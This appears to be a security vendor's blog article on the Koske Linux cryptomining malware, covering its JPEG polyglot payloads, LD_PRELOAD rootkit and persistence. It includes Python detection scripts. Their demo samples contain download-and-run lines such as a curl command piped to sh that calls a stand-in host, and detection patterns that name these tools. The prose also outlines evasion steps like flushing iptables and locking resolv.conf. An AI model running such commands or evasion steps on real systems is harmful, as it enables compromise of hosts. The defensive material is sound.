A new threat targeting Linux systems has emerged: Koske malware. This advanced malware campaign uses JPEG images of panda bears to trick systems into executing hidden malicious code. Researchers believe Koske was developed using artificial intelligence tools like large language models, enabling it to operate with stealth, adaptability, and automation. In this article, we explore how Koske operates, what makes it unique, and why it represents a new generation of AI-assisted malware.
How Koske Gains Access
The initial infection vector leverages exposed or misconfigured JupyterLab instances. Attackers exploit these instances to execute arbitrary commands on the target system. Once they gain access, they download two panda-themed image files hosted on legitimate services such as OVH, freeimage, or postimage. These images appear harmless to users but contain embedded malicious code.
Polyglot Files, Not Steganography
Unlike typical image-based malware that relies on steganography, which buries data inside the pixel values and needs a decoder to pull it back out, Koske relies on polyglot files: files that are valid in more than one format at the same time. Here a single file is both a well-formed JPEG image and a carrier for a shell script or C source code; which one you get depends on the program that reads it.
Opened in a viewer, the file displays an ordinary picture of a panda. A JPEG decoder stops at the end-of-image marker and ignores whatever follows, so code placed after it does not disturb the picture at all. When the attacker's loader extracts that text and hands it to a shell interpreter or a compiler, the hidden code runs with no visual indication that anything is wrong.
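To make the mechanism concrete, here is an added example (not code from the original article or from the researchers who analysed Koske) that checks a JPEG for bytes appended after its end-of-image marker and flags trailing data that looks like shell or C source. It walks the JPEG segment structure rather than searching for the last FF D9, so a stray FF D9 inside the payload cannot hide the boundary. The sample image bytes and the payload string are constructed for the demo, not taken from Koske.

```python
"""Added example: find code hidden after a JPEG's end-of-image (EOI) marker.

A JPEG decoder stops at EOI (FF D9); anything after it is invisible to an
image viewer but is exactly where a polyglot can carry a script. The sample
image and payload below are constructed for this demo, not taken from Koske.
"""
import re
from typing import Optional

SOI, EOI, SOS = 0xD8, 0xD9, 0xDA
STANDALONE = {0x01, *range(0xD0, 0xD8)}  # TEM and RST0-7 carry no length field

# Crude content hints for shell scripts and C source in the trailing bytes.
CODE_HINTS = (
    re.compile(rb"^#!\s*/\S*(sh|bash|python|perl)", re.M),
    re.compile(rb"\b(curl|wget|chmod|crontab|systemctl|chattr|iptables)\b"),
    re.compile(rb"#include\s*<"),
)


def find_eoi(data: bytes) -> Optional[int]:
    """Offset of the first EOI marker, found by walking the segment structure."""
    if len(data) < 4 or data[0] != 0xFF or data[1] != SOI:
        return None
    pos, n = 2, len(data)
    while pos + 1 < n:
        if data[pos] != 0xFF:
            return None  # a marker is required here: malformed file
        marker = data[pos + 1]
        if marker == 0xFF:  # padding byte before a marker
            pos += 1
            continue
        if marker == EOI:
            return pos
        if marker in STANDALONE:
            pos += 2
            continue
        if pos + 4 > n:
            return None
        seglen = int.from_bytes(data[pos + 2:pos + 4], "big")
        pos += 2 + seglen
        if marker == SOS:
            # Entropy-coded scan data follows; skip to the next real marker.
            # FF 00 is a stuffed byte and FF D0-D7 are restart markers, not segments.
            while pos + 1 < n:
                nxt = data[pos + 1]
                if data[pos] == 0xFF and nxt != 0x00 and not (0xD0 <= nxt <= 0xD7):
                    break
                pos += 1
    return None


def analyze_jpeg(data: bytes) -> dict:
    """Report what follows the image and whether it looks like code."""
    eoi = find_eoi(data)
    if eoi is None:
        return {"valid_jpeg": False, "trailing_bytes": 0, "looks_like_code": False, "hints": []}
    trailing = data[eoi + 2:]
    hints = [m.group(0).decode(errors="replace") for p in CODE_HINTS if (m := p.search(trailing))]
    return {
        "valid_jpeg": True,
        "eoi_offset": eoi,
        "trailing_bytes": len(trailing),
        "looks_like_code": bool(hints),
        "hints": hints,
        "preview": trailing[:64],
    }


# Constructed payload for the demo; not the real Koske script.
DEMO_PAYLOAD = b"#!/bin/bash\ncurl -s http://example.invalid/x | sh\n"


def build_sample(payload: bytes = b"") -> bytes:
    """Minimal JPEG skeleton (markers only, not a decodable picture) plus payload."""
    jfif = b"JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"
    app0 = b"\xff\xe0" + (len(jfif) + 2).to_bytes(2, "big") + jfif
    sos_hdr = b"\x01\x01\x00\x00\x3f\x00"
    sos = b"\xff\xda" + (len(sos_hdr) + 2).to_bytes(2, "big") + sos_hdr
    scan = b"\x12\x34\xff\x00\x56\xff\xd0\x78"  # contains a stuffed FF 00 and an RST0
    return b"\xff\xd8" + app0 + sos + scan + b"\xff\xd9" + payload


if __name__ == "__main__":
    for label, blob in (("clean", build_sample()), ("polyglot", build_sample(DEMO_PAYLOAD))):
        print(label, analyze_jpeg(blob))
```

Trailing bytes after EOI are not proof of malice on their own (some cameras and editors leave metadata there), so the content hints matter: a shebang, package-manager or persistence commands, or a C include in that tail is the signal worth escalating.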
Dual Payload Strategy
Each panda image carries one of two payloads, and both are launched in parallel:
- A C-based rootkit: the source is written into memory, compiled on the host, and loaded as a shared object (.so) file.
- A shell script, also executed directly from memory using native Linux utilities.
This combination ensures that the malware can persist on the system, evade detection, and maintain continuous control.
Rootkit Capabilities
The in-memory rootkit is designed to remain hidden. It uses the LD_PRELOAD technique to override the C library's readdir() function, so any process that lists a directory through libc never sees processes, files, or directories whose names contain keywords such as koske or hideproc. It also reads the process IDs it should hide from a file on the RAM-backed /dev/shm filesystem (/dev/shm/.hiddenpid), which never touches disk, and filters those PIDs out of /proc listings, the mechanism user-space monitoring tools such as ps and top rely on to enumerate processes. The trick has a limit worth remembering: a hook at the libc level only blinds software that goes through libc. A directory listing taken from the kernel directly (the getdents64 system call) or from a statically linked tool is not filtered, and a mismatch between the two views is a strong sign of this kind of rootkit.
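The following is an added example (not code from the original article or from the malware) of the detection check that limit suggests: it lists a directory twice, once through libc's readdir() path via os.listdir() and once by issuing the getdents64 system call directly through ctypes, and reports any names only the kernel returns. The syscall-number table is an assumption about the host architecture (x86_64, aarch64 or 32-bit x86 Linux), and the directory contents in demo() are constructed for the demo.

```python
"""Added example: catch readdir()-level hiding by comparing two views of a
directory. An LD_PRELOAD rootkit that wraps readdir(), the technique described
above, changes what libc (and so os.listdir()) returns, but it cannot touch a
getdents64 system call issued directly. Linux only; not code from the article.
"""
import ctypes
import os
import platform
import struct
import tempfile

# getdents64 syscall numbers by architecture (assumption: the host is one of these).
_SYS_GETDENTS64 = {"x86_64": 217, "aarch64": 61, "i686": 220, "i386": 220}
HIDE_KEYWORDS = ("koske", "hideproc")  # names the article says the rootkit filters out


def raw_listdir(path: str) -> set:
    """Directory entries straight from the kernel via getdents64(2), no libc readdir()."""
    nr = _SYS_GETDENTS64.get(platform.machine())
    if platform.system() != "Linux" or nr is None:
        raise OSError("raw getdents64 listing needs Linux on a known architecture")
    libc = ctypes.CDLL(None, use_errno=True)
    buf = ctypes.create_string_buffer(64 * 1024)
    names = set()
    fd = os.open(path, os.O_RDONLY | os.O_DIRECTORY)
    try:
        while True:
            got = libc.syscall(nr, fd, buf, ctypes.sizeof(buf))
            if got < 0:
                raise OSError(ctypes.get_errno(), "getdents64 failed")
            if got == 0:
                break
            off = 0
            while off < got:
                # struct linux_dirent64 { u64 d_ino; s64 d_off; u16 d_reclen;
                #                        u8 d_type; char d_name[]; }  -> 19-byte header
                _ino, _next, reclen, _type = struct.unpack_from("<QqHB", buf.raw, off)
                name = buf.raw[off + 19:off + reclen].split(b"\x00", 1)[0]
                names.add(os.fsdecode(name))
                off += reclen
    finally:
        os.close(fd)
    return names - {".", ".."}


def hidden_entries(path: str) -> set:
    """Names the kernel reports but libc's readdir() path does not."""
    return raw_listdir(path) - set(os.listdir(path))


def hidden_pids() -> set:
    """PIDs present in /proc for the kernel but missing from the libc view.
    A process that exits between the two snapshots shows up here too, so
    re-check a hit before treating it as hidden."""
    return {n for n in hidden_entries("/proc") if n.isdigit()}


def preload_indicators() -> list:
    """Cheap checks for the preload mechanism itself."""
    findings = []
    try:
        with open("/etc/ld.so.preload") as f:
            findings += [f"/etc/ld.so.preload loads {ln.strip()}" for ln in f if ln.strip()]
    except FileNotFoundError:
        pass
    if os.environ.get("LD_PRELOAD"):
        findings.append(f"LD_PRELOAD is set: {os.environ['LD_PRELOAD']}")
    return findings


def demo() -> dict:
    """Create files whose names match the rootkit's keywords and compare views.
    On a clean host 'hidden' is empty; under a readdir() hook that filters
    these keywords the kernel view would still contain them."""
    with tempfile.TemporaryDirectory() as d:
        for name in [k + ".sh" for k in HIDE_KEYWORDS] + ["notes.txt"]:
            open(os.path.join(d, name), "w").close()
        kernel_view = raw_listdir(d)
        libc_view = set(os.listdir(d))
        return {"kernel": kernel_view, "libc": libc_view, "hidden": kernel_view - libc_view}


if __name__ == "__main__":
    print(demo())
    print("preload indicators:", preload_indicators())
    print("hidden pids:", hidden_pids())
```

Run it from a static binary or a fresh environment if you suspect the interpreter itself has been preloaded; the raw syscall path is what makes the comparison trustworthy, not the Python around it.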
Persistence and Evasion Tactics
The shell script establishes persistence through cron jobs that run every 30 minutes and custom systemd services. It also modifies system configurations to evade network monitoring:
- Overwrites /etc/resolv.conf with Cloudflare and Google DNS servers
- Locks the file with chattr +i (the immutable attribute) so it cannot be changed back
- Flushes iptables firewall rules
- Resets system proxy variables
- Brute-forces working proxy servers using curl, wget, and direct TCP checks
These measures make it difficult for defenders to identify or interrupt the malware’s activity.
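The checks below are an added example (not code from the original article) that turns this list into a triage script. Each parser takes plain text, so it can run against output pulled from a suspect host or against the constructed samples included here; collect_live() gathers the same text from the local machine. The paths, sample lines and the set of expected resolvers are assumptions for the demo. One caveat: a host that legitimately runs without a firewall or uses public DNS by design trips the same checks, so compare the findings against a known-good baseline.

```python
"""Added example: triage the persistence and network-tampering indicators
listed above on a Linux host. Not code from the original article. Parsers
take text so they work on collected output or on the constructed samples;
collect_live() gathers the same inputs from the current host.
"""
import glob
import re
import subprocess

PUBLIC_RESOLVERS = {"1.1.1.1", "1.0.0.1", "8.8.8.8", "8.8.4.4"}  # Cloudflare, Google
# Command fragments worth a second look in cron entries or systemd units.
SUSPECT_CMD = re.compile(r"(curl|wget)\b[^|\n]*\|\s*(ba)?sh\b|/dev/shm/|/tmp/|base64\s+-d|memfd", re.I)


def audit_crontab(text: str) -> list:
    """Flag frequent schedules (*/N or every minute) and suspicious commands.
    Handles user crontabs (5 fields + command) and system ones (+ user field)."""
    findings = []
    for line in text.splitlines():
        s = line.strip()
        if not s or s.startswith("#") or "=" in s.split()[0]:
            continue  # blank, comment, or VAR=value
        fields = s.split(None, 5)
        if len(fields) < 6:
            continue
        minute, command = fields[0], fields[5]
        if minute.startswith("*/") or minute == "*" or SUSPECT_CMD.search(command):
            findings.append(("cron", s))
    return findings


def audit_systemd_unit(text: str, path: str = "<unit>") -> list:
    """Flag ExecStart lines that run from volatile paths or pipe a download into sh."""
    return [("systemd", f"{path}: {ln.strip()}") for ln in text.splitlines()
            if ln.strip().startswith("ExecStart") and SUSPECT_CMD.search(ln)]


def immutable_from_lsattr(line: str) -> bool:
    """True if an `lsattr` line shows the 'i' (immutable) attribute set by chattr +i."""
    return "i" in line.split(None, 1)[0]


def audit_resolv(text: str, expected: set) -> list:
    """Nameservers that are not the resolvers this host is supposed to use."""
    seen = [ln.split()[1] for ln in text.splitlines()
            if ln.strip().startswith("nameserver") and len(ln.split()) > 1]
    unexpected = [ns for ns in seen if ns not in expected]
    if not unexpected:
        return []
    kind = "public" if set(unexpected) <= PUBLIC_RESOLVERS else "unknown"
    return [("dns", f"{kind} resolvers replaced the expected ones: {unexpected}")]


def audit_iptables(text: str) -> list:
    """`iptables -S` with only ACCEPT policies and no rules looks like a flushed firewall."""
    lines = [ln.strip() for ln in text.splitlines() if ln.strip()]
    policies = [ln for ln in lines if ln.startswith("-P ")]
    rules = [ln for ln in lines if not ln.startswith("-P ")]
    if policies and not rules and all(ln.endswith("ACCEPT") for ln in policies):
        return [("iptables", "no rules loaded and every chain policy is ACCEPT")]
    return []


def audit_all(cron: str, units: dict, lsattr_resolv: str, resolv: str, iptables: str, expected_ns: set) -> list:
    findings = audit_crontab(cron)
    for path, text in units.items():
        findings += audit_systemd_unit(text, path)
    if immutable_from_lsattr(lsattr_resolv):
        findings.append(("resolv.conf", "immutable attribute set (chattr +i)"))
    return findings + audit_resolv(resolv, expected_ns) + audit_iptables(iptables)


def _run(cmd: list) -> str:
    try:
        return subprocess.run(cmd, capture_output=True, text=True, check=False).stdout
    except OSError:
        return ""


def _read(path: str) -> str:
    try:
        with open(path) as f:
            return f.read()
    except OSError:
        return ""


def collect_live(expected_ns: set) -> list:
    """Gather the same inputs from this host (iptables -S needs root)."""
    cron = _run(["crontab", "-l"]) + "\n" + _read("/etc/crontab")
    units = {p: _read(p) for p in glob.glob("/etc/systemd/system/*.service")}
    lsattr = _run(["lsattr", "/etc/resolv.conf"]).strip() or "- /etc/resolv.conf"
    return audit_all(cron, units, lsattr, _read("/etc/resolv.conf"), _run(["iptables", "-S"]), expected_ns)


# Constructed samples for the demo (not real Koske artefacts).
SAMPLE_CRON = ("SHELL=/bin/sh\n# m h dom mon dow user command\n"
               "17 * * * * root cd / && run-parts --report /etc/cron.hourly\n"
               "*/30 * * * * root /dev/shm/.cache/update.sh >/dev/null 2>&1\n")
SAMPLE_UNIT = "[Service]\nExecStart=/bin/sh -c 'curl -s http://example.invalid/p | sh'\n"
SAMPLE_LSATTR = "----i---------e------- /etc/resolv.conf"
SAMPLE_RESOLV = "nameserver 1.1.1.1\nnameserver 8.8.8.8\n"
SAMPLE_IPTABLES = "-P INPUT ACCEPT\n-P FORWARD ACCEPT\n-P OUTPUT ACCEPT\n"


def demo() -> list:
    return audit_all(SAMPLE_CRON, {"/etc/systemd/system/update.service": SAMPLE_UNIT},
                     SAMPLE_LSATTR, SAMPLE_RESOLV, SAMPLE_IPTABLES, expected_ns={"10.0.0.53"})


if __name__ == "__main__":
    for category, detail in demo():
        print(f"[{category}] {detail}")
```

The immutable-attribute check is the cheapest high-value item here: ordinary configuration management almost never sets chattr +i on /etc/resolv.conf, and a resolver file you cannot edit as root is exactly the symptom an administrator notices first.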
Cryptomining With Intelligence
Once in place, the malware benchmarks the host's CPU and GPU to pick the most efficient miner from a list, then downloads the matching cryptominer from a GitHub repository. Koske can mine 18 different cryptocurrencies, among them Monero, Ravencoin, Zano, Nexa, and Tari.
If a coin or mining pool becomes unavailable, the malware automatically switches to another from its internal list. This level of automation indicates a high degree of adaptability, reinforcing suspicions that the malware was designed using AI tools or automated frameworks.
Why Koske Represents a New Threat Era
Koske combines stealth, adaptability, and resilience in a way that suggests future threats will be even harder to detect and neutralize. Its use of memory-based execution, polyglot files, and real-time decision-making to maintain its mining operations marks a shift in how malware is built and deployed.
As attackers increasingly integrate artificial intelligence into their toolkits, organizations must evolve their defenses. This includes proactive monitoring, anomaly detection, and continuous threat intelligence.
Protect Your Systems from Emerging Threats
Cybersecurity threats like Koske demand robust and adaptive defenses. At ZENDATA, our cybersecurity services are designed to detect, prevent, and respond to sophisticated malware threats. From memory-based payloads to cryptominer detection, we help businesses stay one step ahead.
Read the full BleepingComputer article here.